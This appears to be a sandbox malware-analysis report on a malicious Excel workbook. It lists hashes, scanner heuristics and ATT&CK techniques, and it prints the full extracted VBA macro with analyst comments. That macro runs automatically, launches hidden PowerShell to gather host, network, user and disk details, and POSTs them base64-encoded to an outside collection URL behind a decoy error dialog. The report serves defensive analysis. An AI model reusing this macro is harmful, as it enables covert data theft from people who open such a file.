Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c13ed6cc857d7cc…

MALICIOUS

Office (OLE)

46.5 KB Created: 2017-10-31 13:49:44 Authoring application: Microsoft Excel First seen: 2020-07-02
MD5: f3005d6f77f4b8e4e530eed5f4c9b4a1 SHA-1: 6d58a0c1358e15a9f2f0915b47564b0c2e02ed90 SHA-256: 9c13ed6cc857d7ccd816195e52feae7485b6ec9b7ef7b1f92b62cab639f04478
394 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment
Additional techniques evidenced by the extracted macro source below (not tagged by the scanner): T1204.002 User Execution: Malicious File (the macro only runs once the user enables macros); T1082 System Information Discovery (Environ("computername"/"username"), Win32_LogicalDisk); T1016 System Network Configuration Discovery (Get-NetIPConfiguration); T1087.001 Account Discovery: Local Account (Win32_UserAccount with LocalAccount=True); T1132.001 Data Encoding: Standard Encoding (base64 via MSXML); T1071.001 Application Layer Protocol: Web Protocols (plain-HTTP POST to collect.php).

This Excel workbook carries a VBA module (Module1) that, once macros are enabled, runs a fixed discovery sequence: hostname and username from environment variables without PowerShell, then four hidden powershell.exe invocations via WScript.Shell (IP configuration, all environment variables, local user accounts via Win32_UserAccount, logical disks via Win32_LogicalDisk). Each result is written to a temp file, read back, base64-encoded and POSTed synchronously over plain HTTP to http://osiris.compass-security.com/phishing/collect.php together with a random 32-character run ID, the hard-coded tag "contentfiltercheck" and a mode field ("auto" or "click"). The server response is discarded, so the visible code contains no second-stage download or tasking; a decoy "document is corrupted" dialog is shown afterwards. The module registers several auto-exec entry points (Auto_Open, AutoOpen, Document_Open, AutoExec) plus a button handler; since the authoring application is Excel, Auto_Open is the one expected to fire on open, the others are Word auto-macro names. The auto-exec macros are consistent with delivery as a spearphishing attachment; the "TODO" comments in the source (adjust fileID, commands, collection URL, message language) and the collector's domain suggest a reusable phishing-simulation / awareness-test template rather than a bespoke intrusion payload, but the collection and exfiltration behaviour is real either way.

Heuristics 13

  • ClamAV: Doc.Dropper.Agent-6418305-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6418305-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        tmpOutFile = createTempFile()
        Set wsh = CreateObject("WScript.Shell")
        pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ''' -------------------------------
        ''' myCmd = "<powershell command>"
        ''' output = RunPowershellCmd(myCmd)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HttpReq = CreateObject("MSXML2.XMLHTTP")
        ' change path to collection script here
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
        submit_mode = "auto"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        submit_mode = "auto"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
        submit_mode = "auto"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hostname = Environ("computername")
        username = Environ("username")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://osiris.compass-security.com/phishing/collect.php — In document text (OLE body). The same URL is hard-coded as the POST target in the extracted macro's Request() function (see macros.bas below), so it is the exfiltration endpoint, not merely embedded text.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7832 bytes
SHA-256: b369da19614fd601c7ffceafd35b9405e319d0f6a6e9de2a2676c93b48b6494d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages

' Module-level state shared by the entry points and Request():
'   submit_mode - "auto" when fired by an auto-exec macro, "click" from CommandButton1_Click;
'                 sent to the collector as the "mode" form field
'   runID       - per-run random tag assigned in Exploit() via RandomString(32)
'   fileID      - hard-coded campaign/document tag assigned in Exploit() ("contentfiltercheck")
Public submit_mode As String
Public runID As String
Public fileID As String

' Manual trigger: an ActiveX button click runs the same collection routine,
' tagging the run as "click" so the collector can tell user-initiated runs
' from auto-exec runs. The button itself is not visible in the extracted
' modules (the Sheet1/ThisWorkbook modules below contain no code).
Private Sub CommandButton1_Click()
    submit_mode = "click"
    Call Exploit
End Sub

' Auto-exec entry point under the Word document-open event name.
' NOTE(review): Document_Open is normally a ThisDocument class-module event;
' declared in a standard module inside an Excel workbook it is presumably
' never raised — kept by the author for cross-application coverage. Confirm
' in a sandbox which entry point actually fires.
Public Sub Document_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

' Excel's legacy auto-run macro name. Given the authoring application is
' Excel, this is the entry point expected to fire when the workbook is opened
' with macros enabled — the most likely real trigger for this sample.
Public Sub Auto_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

' Word's AutoOpen auto-macro name (runs when a Word document is opened).
' Not expected to fire under Excel; present so the same module works when
' pasted into a Word template.
Public Sub AutoOpen()
    submit_mode = "auto"
    Call Exploit
End Sub

' Word's AutoExec auto-macro name (runs when Word starts or a global template
' loads). Not surfaced by the heuristics above; another Word-only trigger
' carried along in this Excel sample.
Public Sub AutoExec()
    submit_mode = "auto"
    Call Exploit
End Sub

' Main collection routine, reached from every entry point above.
' Runs a fixed sequence of local discovery steps and POSTs each result to the
' collector through Request(). Nothing returned by the server is acted on, so
' the visible code is a one-shot information-gathering payload, not an
' interactive backdoor. Returns nothing (the Function has no return value).
Function Exploit()
    ' executed attacks are defined here. add more commands using the template below
    ''' template for PS command
    ''' -------------------------------
    ''' myCmd = "<powershell command>"
    ''' output = RunPowershellCmd(myCmd)
    ''' Call Request(output, "<label>")
    ''' -------------------------------
    ' Any runtime error (PowerShell unavailable, COM creation failure, the
    ' Word-only objects at the end) jumps to Err2 and shows a generic dialog.
    On Error GoTo Err2:
    Dim myCmd As String
    Dim output As String
        
    ' generate a random ID to identify connected requests
    ' (32 alphanumerics from RandomString(); lets the collector correlate the
    ' five POSTs of a single run)
    runID = RandomString(32)
    ' hardcoded ID to identify source document of requests
    ' (campaign/template tag sent with every POST)
    fileID = "contentfiltercheck"
    
    ' Basic information gathering without PowerShell
    ' -> label "BasicInfo": COMPUTERNAME and USERNAME from the environment
    Call Request(BasicInfo(), "BasicInfo")
    
    ' Get ip configuration with PS
    ' -> label "ipconfig"; spawns a hidden powershell.exe (see RunPowershellCmd)
    myCmd = "Get-NetIPConfiguration"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "ipconfig")
    
    ' Get environment variables with PS
    ' -> label "env_vars"; full environment, may include paths/usernames/proxy settings
    myCmd = "Get-ChildItem Env:"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "env_vars")
    
    ' Get local user accounts with PS
    ' -> label "local_users"; WMI Win32_UserAccount restricted to local accounts
    myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter  'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_users")
    
    ' Get connected volumes/shares with PS
    ' -> label "local_volumes"; WMI Win32_LogicalDisk (local drives and mapped shares)
    myCmd = "Get-WmiObject -class win32_logicaldisk"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_volumes")
    
    ' Show corruption message and close document
    ' Decoy: the user is told the file is corrupt only after collection has run.
    MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
    ' NOTE(review): ActiveDocument and wdDoNotSaveChanges belong to the Word
    ' object model; under Excel this line presumably raises a runtime error and
    ' control falls through to Err2 (second dialog) — confirm in a sandbox.
    ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
    Exit Function

Err2:
     MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
       
End Function


' POST one labelled, base64-encoded blob to the collection script.
'   data  - payload string; assigning it to a Byte array yields VBA's internal
'           UTF-16LE bytes (BasicInfo() pre-converts to ANSI, so that one arrives 8-bit)
'   label - tag prefixed to the data field ("BasicInfo", "ipconfig", ...)
' Errors (no network, proxy auth, COM failure) are swallowed into a generic dialog.
Function Request(data As String, Optional label As String = "n/a")
    Dim outBytes() As Byte
    Dim encOutput As String
    
    On Error GoTo Err1:
    
    ' base64 encode data to be transmitted
    outBytes = data
    ' MSXML wraps long base64 output with line breaks; only LF is stripped here
    encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
    
    Dim HttpReq As Object
  
    ' Late-bound MSXML2.XMLHTTP — presumably goes through WinINet, so the user's
    ' system/IE proxy settings apply; verify in the sandbox's network capture
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    ' change path to collection script here
    ' Synchronous (async=False) cleartext HTTP POST to the collector — network IOC
    HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
    HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    ' Body fields: fileID=<tag>&runID=<random>&data=<label>:<base64>&mode=auto|click.
    ' NOTE(review): nothing is URL-encoded, so '+' and '=' inside the base64 reach
    ' the server unescaped (a standard form parser turns '+' into a space).
    HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
    ' Response lands in an undeclared, never-read variable: in the visible code
    ' the collector does not task the macro and no second stage is fetched.
    RequestWin = HttpReq.responseText
    Exit Function
    
Err1:
    MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
    
End Function

' Create an empty file in the user's temp folder and return its full path.
' Used by RunPowershellCmd() as the out-file target; the file is never deleted
' by this module, so it remains as a host forensic artifact after execution.
Public Function createTempFile() As String
    ' create a temporary file to store command output
    Dim tmpFolder, tmpName, tmpFile, fso
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    ' GetSpecialFolder(2) is the TemporaryFolder (%TEMP%)
    Set tmpFolder = fso.GetSpecialFolder(2)
    ' FSO-generated random name (typically "rad" + hex + ".tmp" — confirm on the host)
    tmpName = fso.GetTempName
    Set tmpFile = tmpFolder.CreateTextFile(tmpName)
    tmpFile.Close
    createTempFile = tmpFolder & "\" & tmpName
End Function

' Read the whole contents of the PowerShell output file written by RunPowershellCmd().
'   tmpOutFile - path returned by createTempFile()
' OpenTextFile arguments: 1 = ForReading, False = do not create, -1 = TristateTrue
' (open as Unicode/UTF-16). NOTE(review): the PowerShell side writes the file with
' "-encoding utf8", so the text read here may be mis-decoded; the collector
' presumably tolerates garbled output — confirm against a captured POST.
Public Function getOutput(ByVal tmpOutFile As String) As String
    ' retrieve command output from temporary file
    Dim tmpFile, fso

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
    getOutput = tmpFile.readall
    tmpFile.Close
    
End Function

' Host and user identification that needs no PowerShell: reads the COMPUTERNAME
' and USERNAME environment variables and returns "pc:<host>;user:<user>".
' The result is converted from VBA's internal Unicode to ANSI bytes (vbFromUnicode)
' so that Request()'s byte-array copy transmits 8-bit characters rather than UTF-16LE.
Public Function BasicInfo() As String
    ' collect basic information without PS, should work on all systems
    Dim hostname As String
    Dim username As String
    
    hostname = Environ("computername")
    username = Environ("username")
    BasicInfo = "pc:" & hostname & ";user:" & username

    BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
    
End Function

' Run a PowerShell pipeline hidden and return its text output.
'   myCmd - PowerShell expression, interpolated unquoted into the command line
' Builds: PowerShell "<myCmd> | out-file -encoding utf8 <tempfile>" and runs it
' via WScript.Shell. No -NoProfile/-ExecutionPolicy flags are used. Detection
' angle: EXCEL.EXE (or WINWORD.EXE) spawning powershell.exe whose command line
' contains "out-file -encoding utf8" and a %TEMP% path.
Public Function RunPowershellCmd(myCmd As String) As String
    ' execute given powershell command, store output in a temporary file and return output from there
    Dim wsh As Object
    Dim ret
    ' VBA applies "As String" only to pscmd; strOutput and tmpOutFile are Variants
    Dim strOutput, tmpOutFile, pscmd As String
    
    tmpOutFile = createTempFile()
    Set wsh = CreateObject("WScript.Shell")
    ' Chr(34) wraps the pipeline in double quotes so cmd-style parsing keeps it as one argument
    pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
    ' Run(cmd, 0, True): window style 0 = hidden, True = wait for exit; the exit code in ret is unused
    ret = wsh.Run(pscmd, 0, True)
    ' Output is retrieved from the temp file, which is left on disk afterwards
    strOutput = getOutput(tmpOutFile)
     RunPowershellCmd = strOutput
End Function

' Dead code in this sample: not called from any function in the extracted module.
' Despite the name this computes HMAC-SHA1 (keyed with the message itself), then
' base64-encodes the digest, using the .NET crypto classes through COM interop
' (GetBytes_4 / ComputeHash_2 are the COM-exposed overload names). Requires the
' .NET COM registrations to exist on the host. Likely a leftover from the template
' (e.g. for deriving short IDs — the truncation to "cutoff" chars is commented out).
Public Function BASE64SHA1(ByVal sTextToHash As String)
    ' base64 encode data and then hash it with sha1
    Dim asc As Object
    Dim enc As Object
    Dim TextToHash() As Byte
    Dim SharedSecretKey() As Byte
    Dim bytes() As Byte
    ' unused: truncation below is commented out
    Const cutoff As Integer = 5

    Set asc = CreateObject("System.Text.UTF8Encoding")
    Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")

    TextToHash = asc.GetBytes_4(sTextToHash)
    ' key == message, so this is not a secret-keyed MAC, just a deterministic digest
    SharedSecretKey = asc.GetBytes_4(sTextToHash)
    enc.Key = SharedSecretKey

    bytes = enc.ComputeHash_2((TextToHash))
    BASE64SHA1 = EncodeBase64(bytes)
    'BASE64SHA1 = Left(BASE64SHA1, cutoff)

    Set asc = Nothing
    Set enc = Nothing

End Function

' Base64-encode a byte array using the MSXML DOM "bin.base64" typed-node trick
' (no native base64 in VBA). MSXML inserts line breaks into long output; the
' caller (Request) strips LF. Used for every payload sent to the collector.
'   arrData - raw bytes to encode
Public Function EncodeBase64(ByRef arrData() As Byte) As String
    ' base64 encode data
    Dim objXML As Object
    Dim objNode As Object

    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")

    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

    Set objNode = Nothing
    Set objXML = Nothing

End Function

' Inverse of EncodeBase64 via the same MSXML "bin.base64" node. Not called anywhere
' in the extracted module — the sample never decodes data from the server, which
' is consistent with Request() discarding the response. Template leftover.
'   strData - base64 text; returns the decoded bytes
Public Function decodeBase64(ByVal strData As String) As Byte()
    ' base64 decode data
    Dim objXML As Object
    Dim objNode As Object
    
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    decodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

End Function

' Build a random string of length l from [a-zA-Z0-9] using VBA's Rnd (seeded by
' Randomize from the timer) — non-cryptographic, used only as the runID that
' correlates the POSTs of one execution. Returns "" for l <= 0.
'   l - number of characters to produce
Public Function RandomString(l As Integer) As String
    ' generate a random string (lowercase/uppercase/digits) of length l
    Randomize
    Dim rndStr As String
    rndStr = "abcdefghijklmnopqrstuvwxyz"
    rndStr = rndStr & UCase(rndStr) & "0123456789"

    Dim i As Long
    For i = 1 To l
        ' Rnd() in [0,1) scaled to a 1-based index into the 62-char alphabet
        RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
    Next

End Function




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook document module: only the attribute header was extracted — no
' Workbook_Open handler, so in Excel the auto-run trigger is Module1.Auto_Open
' rather than a workbook event.

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 document module: attribute header only, no code. The CommandButton1_Click
' handler lives in Module1, so any button wired to it is presumably an ActiveX
' control on this sheet — not visible in the extracted source.